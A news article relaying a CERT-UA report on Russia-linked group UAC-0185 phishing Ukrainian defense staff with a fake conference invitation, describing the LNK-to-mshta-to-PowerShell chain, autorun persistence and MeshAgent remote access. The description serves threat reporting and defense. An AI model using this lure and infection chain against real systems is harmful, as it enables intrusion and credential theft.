Russian state-linked hackers reportedly target Ukrainian defense contractors

Russian state-linked hackers reportedly target Ukrainian defense contractors

Russian state-linked hackers reportedly target Ukrainian defense contractors

Ukraine said threat actors linked to the Russian state were targeting its defense contractors.

Ukraine’s Computer Emergency Response Team (CERT-UA) released a report stating that a group called UAC-0185 sent emails containing malicious links to employees of Ukrainian defense companies and defense forces.

According to CERT-UA, the threatening group posed as the Ukrainian Union of Industrialists and Entrepreneurs, claiming to invite personnel to a real conference on the transition of Ukrainian defense products to NATO standards, which was held on November 5.

The emails then contained a link that the threat actors believed provided access to information about the invitation, but instead downloaded a file called “list_02-1-437.lnk.”

“Opening the LNK file will download and launch the ‘start.hta’ file using the standard utility mshta.exe,” CERT-UA said.

“The mentioned HTA file contains JavaScript code designed to launch two PowerShell commands, one of which will download and open a bait file in the form of a USPP letter, and the second will download the ‘Front.png’ file, which is a ZIP archive containing three files: ‘Main.bat’, ‘Registry.hta’ and ‘update.exe’, extract the contents of the archive into the Directory. ‘%LOCALAPPDATA%\Microsoft\EdgeUpdate\Update\’ and launch the BAT file ‘Main.bat’.

“The latter will move the ‘Registry.hta’ file to the autorun directory, run it and delete some of the downloaded files from the computer.

“Finally, ‘Registry.hta’ will launch ‘update.exe’, which is classified as a MESHAGENT remote control program.”

The malware contained in the files used is believed to have been used in cyberattacks since early 2023.

Although Ukraine has not named Russia as behind the attacks, UAC-0185, also known as UNC4221, was connected to the Russian government by SentinelOne earlier this year.

The group has been active since at least 2022, according to CERT-UA, and is focused on stealing credentials for Signal, Telegram, WhatsApp and a number of military systems such as DELTA, TENETA and Kropyva.

“At the same time, cyberattacks are carried out to a more limited extent, aimed at obtaining unauthorized remote access to the computers of employees of enterprises of the defense industrial complex, as well as to the Defense Forces of Ukraine, using of specialized software tools, including , MESHAGENT and ULTRAVNC,” said CERT-UA.

OpenAI has won a legal victory against progressive publishers, but the fight is not over

OpenAI has won a legal victory against progressive publishers, but the fight is not over

Model portfolios gaining traction with Australian investors

Model portfolios gaining traction with Australian investors

Leave a Reply

Your email address will not be published. Required fields are marked *